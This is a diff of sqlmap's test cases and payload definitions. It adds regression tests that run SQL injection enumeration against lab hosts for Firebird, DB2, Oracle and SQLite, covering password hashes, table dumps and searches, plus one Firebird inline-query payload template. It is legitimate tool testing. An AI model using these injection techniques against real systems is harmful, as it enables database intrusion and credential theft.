||||||
|
<isDba value="True"/>
|
||||||
|
<getUsers value="True"/>
|
||||||
|
<getPasswordHashes value="True"/>
|
||||||
|
<getPrivileges value="True"/>
|
||||||
|
<getRoles value="True"/>
|
||||||
|
<getDbs value="True"/>
|
||||||
|
<getTables value="True"/>
|
||||||
|
<getColumns value="True"/>
|
||||||
|
<getCount value="True"/>
|
||||||
|
<dumpTable value="True"/>
|
||||||
|
<tbl value="users"/>
|
||||||
|
</switches>
|
||||||
|
<parse>
|
||||||
|
<item value="Title: Generic UNION query (NULL) - 3 columns"/>
|
||||||
|
<item value="r'back-end DBMS: active fingerprint: Firebird 2.1 \(dialect 3\)'"/>
|
||||||
|
<item value="banner: '2.5.0'"/>
|
||||||
|
<item value="current user: 'SYSDBA'"/>
|
||||||
|
<item value="r'current database: '/'"/>
|
||||||
|
<item value="current user is DBA: True"/>
|
||||||
|
<item value="r'database management system users \[.+PUBLIC.+SYSDBA'"/>
|
||||||
|
<item value="r'database management system users privileges:.+PUBLIC.+privilege: SELECT.+SYSDBA.+privilege: DELETE.+privilege: UPDATE'"/>
|
||||||
|
<item value="r'database management system users roles:.+PUBLIC.+role: SELECT.+SYSDBA.+role: DELETE.+role: UPDATE'"/>
|
||||||
|
<item value="r'Database: Firebird_masterdb.+1 table.+USERS'"/>
|
||||||
|
<item value="r'Database: Firebird_masterdb.+Table: USERS.+3 columns.+SURNAME.+VARCHAR'"/>
|
||||||
|
<item value="r'Database: Firebird_masterdb.+Table.+Entries.+USERS.+5'"/>
|
||||||
|
<item value="r'Database: Firebird_masterdb.+Table: USERS.+5 entries.+luther.+nameisnull.+'"/>
|
||||||
|
</parse>
|
||||||
|
</case>
|
||||||
|
<!-- TODO: this test case fails because of issue #357 -->
|
||||||
|
<case name="Firebird partial UNION query multi-threaded enumeration - all entries">
|
||||||
|
<switches>
|
||||||
|
<url value="http://debiandev/sqlmap/firebird/get_int_partialunion.php?id=1"/>
|
||||||
|
<threads value="4"/>
|
||||||
|
<tech value="U"/>
|
||||||
|
<extensiveFp value="True"/>
|
||||||
|
<getBanner value="True"/>
|
||||||
|
<getCurrentUser value="True"/>
|
||||||
|
<getCurrentDb value="True"/>
|
||||||
|
<getHostname value="True"/>
|
||||||
|
<isDba value="True"/>
|
||||||
|
<getUsers value="True"/>
|
||||||
|
<getPasswordHashes value="True"/>
|
||||||
|
<getPrivileges value="True"/>
|
||||||
|
<getRoles value="True"/>
|
||||||
|
<getDbs value="True"/>
|
||||||
|
<getTables value="True"/>
|
||||||
|
<getColumns value="True"/>
|
||||||
|
<getCount value="True"/>
|
||||||
|
<dumpTable value="True"/>
|
||||||
|
<tbl value="users"/>
|
||||||
|
</switches>
|
||||||
|
<parse>
|
||||||
|
<item value="Title: Generic UNION query (NULL) - 3 columns"/>
|
||||||
|
<item value="r'back-end DBMS: active fingerprint: Firebird 2.1 \(dialect 3\)'"/>
|
||||||
|
<item value="banner: '2.5.0'"/>
|
||||||
|
<item value="current user: 'SYSDBA'"/>
|
||||||
|
<item value="r'current database: '/'"/>
|
||||||
|
<item value="current user is DBA: True"/>
|
||||||
|
<item value="r'database management system users \[.+PUBLIC.+SYSDBA'"/>
|
||||||
|
<item value="r'database management system users privileges:.+PUBLIC.+privilege: SELECT.+SYSDBA.+privilege: DELETE.+privilege: UPDATE'"/>
|
||||||
|
<item value="r'database management system users roles:.+PUBLIC.+role: SELECT.+SYSDBA.+role: DELETE.+role: UPDATE'"/>
|
||||||
|
<item value="r'Database: Firebird_masterdb.+1 table.+USERS'"/>
|
||||||
|
<item value="r'Database: Firebird_masterdb.+Table: USERS.+3 columns.+SURNAME.+VARCHAR'"/>
|
||||||
|
<item value="r'Database: Firebird_masterdb.+Table.+Entries.+USERS.+5'"/>
|
||||||
|
<item value="r'Database: Firebird_masterdb.+Table: USERS.+5 entries.+luther.+nameisnull.+'"/>
|
||||||
|
</parse>
|
||||||
|
</case>
|
||||||
|
<case name="Firebird time-based single-threaded enumeration - all entries">
|
||||||
|
<switches>
|
||||||
|
<url value="http://debiandev/sqlmap/firebird/get_int_nooutput.php?id=1"/>
|
||||||
|
<tech value="T"/>
|
||||||
|
<level value="4"/>
|
||||||
|
<risk value="2"/>
|
||||||
|
<timeSec value="2"/>
|
||||||
|
<getBanner value="True"/>
|
||||||
|
<isDba value="True"/>
|
||||||
|
</switches>
|
||||||
|
<parse>
|
||||||
|
<item value="Title: Firebird AND time-based blind (heavy query)"/>
|
||||||
|
<item value="banner: '2.5.0'"/>
|
||||||
|
<item value="current user is DBA: True"/>
|
||||||
|
</parse>
|
||||||
|
</case>
|
||||||
|
<case name="Firebird inline queries multi-threaded enumeration - all entries">
|
||||||
|
<switches>
|
||||||
|
<url value="http://debiandev/sqlmap/firebird/get_int_inline.php?id=1"/>
|
||||||
|
<threads value="4"/>
|
||||||
|
<tech value="Q"/>
|
||||||
|
<level value="2"/>
|
||||||
|
<extensiveFp value="True"/>
|
||||||
|
<getBanner value="True"/>
|
||||||
|
<getCurrentUser value="True"/>
|
||||||
|
<getCurrentDb value="True"/>
|
||||||
|
<getHostname value="True"/>
|
||||||
|
<isDba value="True"/>
|
||||||
|
<getUsers value="True"/>
|
||||||
|
<getPasswordHashes value="True"/>
|
||||||
|
<getPrivileges value="True"/>
|
||||||
|
<getRoles value="True"/>
|
||||||
|
<getDbs value="True"/>
|
||||||
|
<getTables value="True"/>
|
||||||
|
<getColumns value="True"/>
|
||||||
|
<getCount value="True"/>
|
||||||
|
<dumpTable value="True"/>
|
||||||
|
<tbl value="users"/>
|
||||||
|
</switches>
|
||||||
|
<parse>
|
||||||
|
<item value="Title: Firebird inline queries"/>
|
||||||
|
<item value="r'back-end DBMS: active fingerprint: Firebird 2.1 \(dialect 3\)'"/>
|
||||||
|
<item value="banner: '2.5.0'"/>
|
||||||
|
<item value="current user: 'SYSDBA'"/>
|
||||||
|
<item value="r'current database: '/'"/>
|
||||||
|
<item value="current user is DBA: True"/>
|
||||||
|
<item value="r'database management system users \[.+PUBLIC.+SYSDBA'"/>
|
||||||
|
<item value="r'database management system users privileges:.+PUBLIC.+privilege: SELECT.+SYSDBA.+privilege: DELETE.+privilege: UPDATE'"/>
|
||||||
|
<item value="r'database management system users roles:.+PUBLIC.+role: SELECT.+SYSDBA.+role: DELETE.+role: UPDATE'"/>
|
||||||
|
<item value="r'Database: Firebird_masterdb.+1 table.+USERS'"/>
|
||||||
|
<item value="r'Database: Firebird_masterdb.+Table: USERS.+3 columns.+SURNAME.+VARCHAR'"/>
|
||||||
|
<item value="r'Database: Firebird_masterdb.+Table.+Entries.+USERS.+5'"/>
|
||||||
|
<item value="r'Database: Firebird_masterdb.+Table: USERS.+5 entries.+luther.+nameisnull.+'"/>
|
||||||
|
</parse>
|
||||||
|
</case>
|
||||||
<!-- End of common enumeration switches across all techniques -->
|
<!-- End of common enumeration switches across all techniques -->
|
||||||
|
|
||||||
<!-- Custom enumeration switches -->
|
<!-- Custom enumeration switches -->
|
||||||
|
@ -1044,6 +1255,21 @@
|
||||||
<item value="r'Database: SYS.+Table: USERS.+5 entries.+the | iss.+<blank> | mei'"/>
|
<item value="r'Database: SYS.+Table: USERS.+5 entries.+the | iss.+<blank> | mei'"/>
|
||||||
</parse>
|
</parse>
|
||||||
</case>
|
</case>
|
||||||
|
<case name="IBM DB2 boolean-based multi-threaded custom enumeration - substring">
|
||||||
|
<switches>
|
||||||
|
<url value="http://debiandev/sqlmap/db2/get_int.php?id=1"/>
|
||||||
|
<threads value="4"/>
|
||||||
|
<tech value="B"/>
|
||||||
|
<dumpTable value="True"/>
|
||||||
|
<db value="db2inst1"/>
|
||||||
|
<tbl value="users"/>
|
||||||
|
<firstChar value="3"/>
|
||||||
|
<lastChar value="5"/>
|
||||||
|
</switches>
|
||||||
|
<parse>
|
||||||
|
<item value="r'Database: DB2INST1.+Table: USERS.+5 entries.+the | iss.+NULL | mei'"/>
|
||||||
|
</parse>
|
||||||
|
</case>
|
||||||
<case name="SQLite UNION query multi-threaded custom enumeration">
|
<case name="SQLite UNION query multi-threaded custom enumeration">
|
||||||
<switches>
|
<switches>
|
||||||
<url value="http://debiandev/sqlmap/sqlite/get_int.php?id=1"/>
|
<url value="http://debiandev/sqlmap/sqlite/get_int.php?id=1"/>
|
||||||
|
@ -1671,6 +1897,294 @@
|
||||||
<item value="r'Database: information_schema.+Table: sql_parts.+1 column.+feature_name.+character_data'"/>
|
<item value="r'Database: information_schema.+Table: sql_parts.+1 column.+feature_name.+character_data'"/>
|
||||||
</parse>
|
</parse>
|
||||||
</case>
|
</case>
|
||||||
|
<case name="Oracle boolean-based multi-threaded search enumeration - database">
|
||||||
|
<switches>
|
||||||
|
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
|
||||||
|
<threads value="4"/>
|
||||||
|
<tech value="B"/>
|
||||||
|
<search value="True"/>
|
||||||
|
<db value="sys"/>
|
||||||
|
</switches>
|
||||||
|
<parse>
|
||||||
|
<item value="r'found databases.+:.+\[\*\] CTXSYS.+\[\*\] SYS.+\[\*\] TSMSYS'"/>
|
||||||
|
</parse>
|
||||||
|
</case>
|
||||||
|
<case name="Oracle error-based multi-threaded search enumeration - database">
|
||||||
|
<switches>
|
||||||
|
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
|
||||||
|
<threads value="4"/>
|
||||||
|
<tech value="E"/>
|
||||||
|
<search value="True"/>
|
||||||
|
<db value="sys"/>
|
||||||
|
</switches>
|
||||||
|
<parse>
|
||||||
|
<item value="r'found databases.+:.+\[\*\] CTXSYS.+\[\*\] SYS.+\[\*\] TSMSYS'"/>
|
||||||
|
</parse>
|
||||||
|
</case>
|
||||||
|
<case name="Oracle UNION query multi-threaded search enumeration - database">
|
||||||
|
<switches>
|
||||||
|
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
|
||||||
|
<threads value="4"/>
|
||||||
|
<tech value="U"/>
|
||||||
|
<search value="True"/>
|
||||||
|
<db value="sys"/>
|
||||||
|
</switches>
|
||||||
|
<parse>
|
||||||
|
<item value="r'found databases.+:.+\[\*\] CTXSYS.+\[\*\] SYS.+\[\*\] TSMSYS'"/>
|
||||||
|
</parse>
|
||||||
|
</case>
|
||||||
|
<case name="Oracle boolean-based multi-threaded search enumeration - tables given database">
|
||||||
|
<switches>
|
||||||
|
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
|
||||||
|
<threads value="4"/>
|
||||||
|
<tech value="B"/>
|
||||||
|
<search value="True"/>
|
||||||
|
<db value="sys"/>
|
||||||
|
<tbl value="user,aux,wrong"/>
|
||||||
|
<answer value="do you want to dump tables=N,do you want to crack them via a dictionary-based attack=N"/>
|
||||||
|
</switches>
|
||||||
|
<parse>
|
||||||
|
<item value="r'Database: SYS.+9 tables.+AUX_STATS.+USERS.+AUX_HISTORY'"/>
|
||||||
|
</parse>
|
||||||
|
</case>
|
||||||
|
<case name="Oracle error-based multi-threaded search enumeration - tables given database">
|
||||||
|
<switches>
|
||||||
|
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
|
||||||
|
<threads value="4"/>
|
||||||
|
<tech value="E"/>
|
||||||
|
<search value="True"/>
|
||||||
|
<db value="sys"/>
|
||||||
|
<tbl value="user,aux,wrong"/>
|
||||||
|
<answer value="do you want to crack them via a dictionary-based attack=N"/>
|
||||||
|
</switches>
|
||||||
|
<parse>
|
||||||
|
<item value="r'Database: SYS.+9 tables.+AUX_STATS.+USERS.+AUX_HISTORY'"/>
|
||||||
|
<item value="r'.+5 entries.+wu.+nameisnull'"/>
|
||||||
|
</parse>
|
||||||
|
</case>
|
||||||
|
<case name="Oracle UNION query multi-threaded search enumeration - tables given database">
|
||||||
|
<switches>
|
||||||
|
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
|
||||||
|
<threads value="4"/>
|
||||||
|
<tech value="U"/>
|
||||||
|
<search value="True"/>
|
||||||
|
<db value="sys"/>
|
||||||
|
<tbl value="user,aux,wrong"/>
|
||||||
|
<answer value="do you want to crack them via a dictionary-based attack=N"/>
|
||||||
|
</switches>
|
||||||
|
<parse>
|
||||||
|
<item value="r'Database: SYS.+9 tables.+AUX_STATS.+USERS.+AUX_HISTORY'"/>
|
||||||
|
<item value="r'.+5 entries.+wu.+nameisnull'"/>
|
||||||
|
</parse>
|
||||||
|
</case>
|
||||||
|
<case name="Oracle boolean-based multi-threaded search enumeration - tables without given database">
|
||||||
|
<switches>
|
||||||
|
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
|
||||||
|
<threads value="4"/>
|
||||||
|
<tech value="B"/>
|
||||||
|
<search value="True"/>
|
||||||
|
<tbl value="users"/>
|
||||||
|
<answers value="do you want to dump=N"/>
|
||||||
|
</switches>
|
||||||
|
<parse>
|
||||||
|
<item value="r'Database: SYS.+1 table.+USERS.+Database: FLOWS_020100.+2 table.+WWV_FLOW_PICK_END_USERS'"/>
|
||||||
|
</parse>
|
||||||
|
</case>
|
||||||
|
<case name="Oracle error-based multi-threaded search enumeration - tables without given database">
|
||||||
|
<switches>
|
||||||
|
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
|
||||||
|
<threads value="4"/>
|
||||||
|
<tech value="E"/>
|
||||||
|
<search value="True"/>
|
||||||
|
<tbl value="users"/>
|
||||||
|
<answers value="do you want to dump=N"/>
|
||||||
|
</switches>
|
||||||
|
<parse>
|
||||||
|
<item value="r'Database: SYS.+1 table.+USERS.+Database: FLOWS_020100.+2 table.+WWV_FLOW_PICK_END_USERS'"/>
|
||||||
|
</parse>
|
||||||
|
</case>
|
||||||
|
<case name="Oracle UNION query multi-threaded search enumeration - tables without given database">
|
||||||
|
<switches>
|
||||||
|
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
|
||||||
|
<threads value="4"/>
|
||||||
|
<tech value="U"/>
|
||||||
|
<search value="True"/>
|
||||||
|
<tbl value="users"/>
|
||||||
|
<answers value="do you want to dump=N"/>
|
||||||
|
</switches>
|
||||||
|
<parse>
|
||||||
|
<item value="r'Database: SYS.+1 table.+USERS.+Database: FLOWS_020100.+2 table.+WWV_FLOW_PICK_END_USERS'"/>
|
||||||
|
</parse>
|
||||||
|
</case>
|
||||||
|
<case name="Oracle boolean-based multi-threaded search enumeration - column without given db or table">
|
||||||
|
<switches>
|
||||||
|
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
|
||||||
|
<threads value="4"/>
|
||||||
|
<tech value="B"/>
|
||||||
|
<search value="True"/>
|
||||||
|
<col value="surname,foobar"/>
|
||||||
|
<answers value="do you want to dump=N"/>
|
||||||
|
</switches>
|
||||||
|
<parse>
|
||||||
|
<item value="r'Database: SYS.+Table: USERS.+1 column.+SURNAME'"/>
|
||||||
|
</parse>
|
||||||
|
</case>
|
||||||
|
<case name="Oracle error-based multi-threaded search enumeration - column without given db or table">
|
||||||
|
<switches>
|
||||||
|
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
|
||||||
|
<threads value="4"/>
|
||||||
|
<tech value="E"/>
|
||||||
|
<search value="True"/>
|
||||||
|
<col value="surname,foobar"/>
|
||||||
|
<answers value="do you want to dump=N"/>
|
||||||
|
</switches>
|
||||||
|
<parse>
|
||||||
|
<item value="r'Database: SYS.+Table: USERS.+1 column.+SURNAME.+VARCHAR2'"/>
|
||||||
|
</parse>
|
||||||
|
</case>
|
||||||
|
<case name="Oracle UNION query multi-threaded search enumeration - column without given db or table">
|
||||||
|
<switches>
|
||||||
|
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
|
||||||
|
<threads value="4"/>
|
||||||
|
<tech value="U"/>
|
||||||
|
<search value="True"/>
|
||||||
|
<col value="surname,foobar"/>
|
||||||
|
<answers value="do you want to dump=N"/>
|
||||||
|
</switches>
|
||||||
|
<parse>
|
||||||
|
<item value="r'Database: SYS.+Table: USERS.+1 column.+SURNAME.+VARCHAR2'"/>
|
||||||
|
</parse>
|
||||||
|
</case>
|
||||||
|
<case name="Oracle boolean-based multi-threaded search enumeration - column given databases">
|
||||||
|
<switches>
|
||||||
|
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
|
||||||
|
<threads value="4"/>
|
||||||
|
<tech value="B"/>
|
||||||
|
<search value="True"/>
|
||||||
|
<db value="sys,foobar"/>
|
||||||
|
<col value="surname"/>
|
||||||
|
<answers value="do you want to dump=N"/>
|
||||||
|
</switches>
|
||||||
|
<parse>
|
||||||
|
<item value="r'Database: SYS.+Table: USERS.+1 column.+SURNAME'"/>
|
||||||
|
</parse>
|
||||||
|
</case>
|
||||||
|
<case name="Oracle error-based multi-threaded search enumeration - column given databases">
|
||||||
|
<switches>
|
||||||
|
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
|
||||||
|
<threads value="4"/>
|
||||||
|
<tech value="E"/>
|
||||||
|
<search value="True"/>
|
||||||
|
<db value="sys,foobar"/>
|
||||||
|
<col value="surname"/>
|
||||||
|
<answers value="do you want to dump=N"/>
|
||||||
|
</switches>
|
||||||
|
<parse>
|
||||||
|
<item value="r'Database: SYS.+Table: USERS.+1 column.+SURNAME.+VARCHAR2'"/>
|
||||||
|
</parse>
|
||||||
|
</case>
|
||||||
|
<case name="Oracle UNION query multi-threaded search enumeration - column given databases">
|
||||||
|
<switches>
|
||||||
|
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
|
||||||
|
<threads value="4"/>
|
||||||
|
<tech value="U"/>
|
||||||
|
<search value="True"/>
|
||||||
|
<db value="sys,foobar"/>
|
||||||
|
<col value="surname"/>
|
||||||
|
<answers value="do you want to dump=N"/>
|
||||||
|
</switches>
|
||||||
|
<parse>
|
||||||
|
<item value="r'Database: SYS.+Table: USERS.+1 column.+SURNAME.+VARCHAR2'"/>
|
||||||
|
</parse>
|
||||||
|
</case>
|
||||||
|
<case name="Oracle boolean-based multi-threaded search enumeration - column given tables">
|
||||||
|
<switches>
|
||||||
|
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
|
||||||
|
<threads value="4"/>
|
||||||
|
<tech value="B"/>
|
||||||
|
<search value="True"/>
|
||||||
|
<tbl value="users,foobar"/>
|
||||||
|
<col value="surname"/>
|
||||||
|
<answers value="do you want to dump=N"/>
|
||||||
|
</switches>
|
||||||
|
<parse>
|
||||||
|
<item value="r'Database: SYS.+Table: USERS.+1 column.+SURNAME'"/>
|
||||||
|
</parse>
|
||||||
|
</case>
|
||||||
|
<case name="Oracle error-based multi-threaded search enumeration - column given tables">
|
||||||
|
<switches>
|
||||||
|
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
|
||||||
|
<threads value="4"/>
|
||||||
|
<tech value="E"/>
|
||||||
|
<search value="True"/>
|
||||||
|
<tbl value="users,foobar"/>
|
||||||
|
<col value="surname"/>
|
||||||
|
<answers value="do you want to dump=N"/>
|
||||||
|
</switches>
|
||||||
|
<parse>
|
||||||
|
<item value="r'Database: SYS.+Table: USERS.+1 column.+SURNAME.+VARCHAR2'"/>
|
||||||
|
</parse>
|
||||||
|
</case>
|
||||||
|
<case name="Oracle UNION query multi-threaded search enumeration - column given tables">
|
||||||
|
<switches>
|
||||||
|
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
|
||||||
|
<threads value="4"/>
|
||||||
|
<tech value="U"/>
|
||||||
|
<search value="True"/>
|
||||||
|
<tbl value="users,foobar"/>
|
||||||
|
<col value="surname"/>
|
||||||
|
<answers value="do you want to dump=N"/>
|
||||||
|
</switches>
|
||||||
|
<parse>
|
||||||
|
<item value="r'Database: SYS.+Table: USERS.+1 column.+SURNAME.+VARCHAR2'"/>
|
||||||
|
</parse>
|
||||||
|
</case>
|
||||||
|
<case name="Oracle boolean-based multi-threaded search enumeration - column given databases and table">
|
||||||
|
<switches>
|
||||||
|
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
|
||||||
|
<threads value="4"/>
|
||||||
|
<tech value="B"/>
|
||||||
|
<search value="True"/>
|
||||||
|
<db value="sys,foobar"/>
|
||||||
|
<tbl value="users"/>
|
||||||
|
<col value="surname"/>
|
||||||
|
<answers value="do you want to dump=N"/>
|
||||||
|
</switches>
|
||||||
|
<parse>
|
||||||
|
<item value="r'Database: SYS.+Table: USERS.+1 column.+SURNAME'"/>
|
||||||
|
</parse>
|
||||||
|
</case>
|
||||||
|
<case name="Oracle error-based multi-threaded search enumeration - column given databases and table">
|
||||||
|
<switches>
|
||||||
|
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
|
||||||
|
<threads value="4"/>
|
||||||
|
<tech value="E"/>
|
||||||
|
<search value="True"/>
|
||||||
|
<db value="sys,foobar"/>
|
||||||
|
<tbl value="users"/>
|
||||||
|
<col value="surname"/>
|
||||||
|
<answers value="do you want to dump=N"/>
|
||||||
|
</switches>
|
||||||
|
<parse>
|
||||||
|
<item value="r'Database: SYS.+Table: USERS.+1 column.+SURNAME.+VARCHAR2'"/>
|
||||||
|
</parse>
|
||||||
|
</case>
|
||||||
|
<case name="Oracle UNION query multi-threaded search enumeration - column given databases and table">
|
||||||
|
<switches>
|
||||||
|
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
|
||||||
|
<threads value="4"/>
|
||||||
|
<tech value="U"/>
|
||||||
|
<search value="True"/>
|
||||||
|
<db value="sys,foobar"/>
|
||||||
|
<tbl value="users"/>
|
||||||
|
<col value="surname"/>
|
||||||
|
<answers value="do you want to dump=N"/>
|
||||||
|
</switches>
|
||||||
|
<parse>
|
||||||
|
<item value="r'Database: SYS.+Table: USERS.+1 column.+SURNAME.+VARCHAR2'"/>
|
||||||
|
</parse>
|
||||||
|
</case>
|
||||||
|
<!-- TODO: add IBM DB2 test cases -->
|
||||||
<case name="SQLite multi-threaded search enumeration - database">
|
<case name="SQLite multi-threaded search enumeration - database">
|
||||||
<switches>
|
<switches>
|
||||||
<url value="http://debiandev/sqlmap/sqlite/get_int.php?id=1"/>
|
<url value="http://debiandev/sqlmap/sqlite/get_int.php?id=1"/>
|
||||||
|
@ -1845,6 +2359,73 @@
|
||||||
<item value="r'SELECT \* FROM users ORDER BY name \[5\].+1, luther, blisset.+2, fluffy, bunny.+3, wu, ming'"/>
|
<item value="r'SELECT \* FROM users ORDER BY name \[5\].+1, luther, blisset.+2, fluffy, bunny.+3, wu, ming'"/>
|
||||||
</parse>
|
</parse>
|
||||||
</case>
|
</case>
|
||||||
|
<case name="Oracle boolean-based multi-threaded custom SQL query enumeration">
|
||||||
|
<switches>
|
||||||
|
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
|
||||||
|
<threads value="4"/>
|
||||||
|
<tech value="B"/>
|
||||||
|
<query value="SELECT * FROM users WHERE ROWNUM=1"/>
|
||||||
|
</switches>
|
||||||
|
<parse>
|
||||||
|
<item value="r'SELECT \* FROM users WHERE ROWNUM=1.+1, luther, blisset'"/>
|
||||||
|
</parse>
|
||||||
|
</case>
|
||||||
|
<case name="Oracle error-based multi-threaded custom SQL query enumeration">
|
||||||
|
<switches>
|
||||||
|
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
|
||||||
|
<threads value="4"/>
|
||||||
|
<tech value="E"/>
|
||||||
|
<query value="SELECT * FROM users WHERE ROWNUM=1"/>
|
||||||
|
</switches>
|
||||||
|
<parse>
|
||||||
|
<item value="r'SELECT \* FROM users WHERE ROWNUM=1 \[.+1.+luther'"/>
|
||||||
|
</parse>
|
||||||
|
</case>
|
||||||
|
<case name="Oracle UNION query multi-threaded custom SQL query enumeration">
|
||||||
|
<switches>
|
||||||
|
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
|
||||||
|
<threads value="4"/>
|
||||||
|
<tech value="U"/>
|
||||||
|
<query value="SELECT * FROM users WHERE ROWNUM=1"/>
|
||||||
|
</switches>
|
||||||
|
<parse>
|
||||||
|
<item value="r'SELECT \* FROM users WHERE ROWNUM=1 \[1\].+1, luther, blisset'"/>
|
||||||
|
</parse>
|
||||||
|
</case>
|
||||||
|
<case name="Oracle boolean-based multi-threaded custom ordered SQL query enumeration">
|
||||||
|
<switches>
|
||||||
|
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
|
||||||
|
<threads value="4"/>
|
||||||
|
<tech value="B"/>
|
||||||
|
<query value="SELECT * FROM users ORDER BY name"/>
|
||||||
|
</switches>
|
||||||
|
<parse>
|
||||||
|
<item value="r'SELECT \* FROM users ORDER BY name \[5\].+1, luther, blisset.+2, fluffy, bunny.+3, wu, ming'"/>
|
||||||
|
</parse>
|
||||||
|
</case>
|
||||||
|
<case name="Oracle error-based multi-threaded custom ordered SQL query enumeration">
|
||||||
|
<switches>
|
||||||
|
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
|
||||||
|
<threads value="4"/>
|
||||||
|
<tech value="E"/>
|
||||||
|
<query value="SELECT * FROM users ORDER BY name"/>
|
||||||
|
</switches>
|
||||||
|
<parse>
|
||||||
|
<item value="r'SELECT \* FROM users ORDER BY name \[5\].+1, luther, blisset.+2, fluffy, bunny.+3, wu, ming'"/>
|
||||||
|
</parse>
|
||||||
|
</case>
|
||||||
|
<case name="Oracle UNION query multi-threaded custom ordered SQL query enumeration">
|
||||||
|
<switches>
|
||||||
|
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
|
||||||
|
<threads value="4"/>
|
||||||
|
<tech value="U"/>
|
||||||
|
<query value="SELECT * FROM users ORDER BY name"/>
|
||||||
|
</switches>
|
||||||
|
<parse>
|
||||||
|
<item value="r'SELECT \* FROM users ORDER BY name \[5\].+1, luther, blisset.+2, fluffy, bunny.+3, wu, ming'"/>
|
||||||
|
</parse>
|
||||||
|
</case>
|
||||||
|
<!-- TODO: add IBM DB2 test cases -->
|
||||||
<case name="SQLite boolean-based multi-threaded custom SQL query enumeration">
|
<case name="SQLite boolean-based multi-threaded custom SQL query enumeration">
|
||||||
<switches>
|
<switches>
|
||||||
<url value="http://debiandev/sqlmap/sqlite/get_int.php?id=1"/>
|
<url value="http://debiandev/sqlmap/sqlite/get_int.php?id=1"/>
|
||||||
|
@ -1886,7 +2467,6 @@
|
||||||
<query value="SELECT * FROM users ORDER BY name"/>
|
<query value="SELECT * FROM users ORDER BY name"/>
|
||||||
</switches>
|
</switches>
|
||||||
<parse>
|
<parse>
|
||||||
<!-- NOTE: it is not sorted on purpose because UNION does not play well with ORDER BY and it is stripped -->
|
|
||||||
<item value="r'SELECT \* FROM users ORDER BY name \[4\].+1, luther, blisset.+2, fluffy, bunny.+3, wu, ming'"/>
|
<item value="r'SELECT \* FROM users ORDER BY name \[4\].+1, luther, blisset.+2, fluffy, bunny.+3, wu, ming'"/>
|
||||||
</parse>
|
</parse>
|
||||||
</case>
|
</case>
|
||||||
|
|
|
@ -1996,6 +1996,24 @@ Formats:
|
||||||
<dbms>SQLite</dbms>
|
<dbms>SQLite</dbms>
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
<test>
|
||||||
|
<title>Firebird inline queries</title>
|
||||||
|
<stype>6</stype>
|
||||||
|
<level>2</level>
|
||||||
|
<risk>1</risk>
|
||||||
|
<clause>1,2,3,8</clause>
|
||||||
|
<where>3</where>
|
||||||
|
<vector>[QUERY]</vector>
|
||||||
|
<request>
|
||||||
|
<payload>SELECT '[DELIMITER_START]'||(CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END)||'[DELIMITER_STOP]' FROM RDB$DATABASE</payload>
|
||||||
|
</request>
|
||||||
|
<response>
|
||||||
|
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||||
|
</response>
|
||||||
|
<details>
|
||||||
|
<dbms>Firebird</dbms>
|
||||||
|
</details>
|
||||||
|
</test>
|
||||||
<!-- End of inline queries tests -->
|
<!-- End of inline queries tests -->
|
||||||
|
|
||||||
|
|
||||||
|
|
|
@ -209,7 +209,7 @@
|
||||||
<length query="LENGTH(%s)"/>
|
<length query="LENGTH(%s)"/>
|
||||||
<isnull query="NVL(%s,' ')"/>
|
<isnull query="NVL(%s,' ')"/>
|
||||||
<delimiter query="||"/>
|
<delimiter query="||"/>
|
||||||
<limit query="ROWNUM AS LIMIT %s ORDER BY 1 ASC) WHERE LIMIT"/>
|
<limit query="ROWNUM AS LIMIT %s) WHERE LIMIT"/>
|
||||||
<limitregexp query="ROWNUM\s+AS\s+.+?\s+FROM\s+.+?\)\s+WHERE\s+.+?\s*=\s*[\d]+|ROWNUM\s*=\s*[\d]+"/>
|
<limitregexp query="ROWNUM\s+AS\s+.+?\s+FROM\s+.+?\)\s+WHERE\s+.+?\s*=\s*[\d]+|ROWNUM\s*=\s*[\d]+"/>
|
||||||
<limitgroupstart/>
|
<limitgroupstart/>
|
||||||
<limitgroupstop/>
|
<limitgroupstop/>
|
||||||
|
@ -269,8 +269,8 @@
|
||||||
<blind query="SELECT TABLE_NAME FROM (SELECT TABLE_NAME,ROWNUM AS LIMIT FROM SYS.ALL_TABLES WHERE OWNER='%s') WHERE LIMIT=%d" count="SELECT COUNT(TABLE_NAME) FROM SYS.ALL_TABLES WHERE OWNER='%s'"/>
|
<blind query="SELECT TABLE_NAME FROM (SELECT TABLE_NAME,ROWNUM AS LIMIT FROM SYS.ALL_TABLES WHERE OWNER='%s') WHERE LIMIT=%d" count="SELECT COUNT(TABLE_NAME) FROM SYS.ALL_TABLES WHERE OWNER='%s'"/>
|
||||||
</tables>
|
</tables>
|
||||||
<columns>
|
<columns>
|
||||||
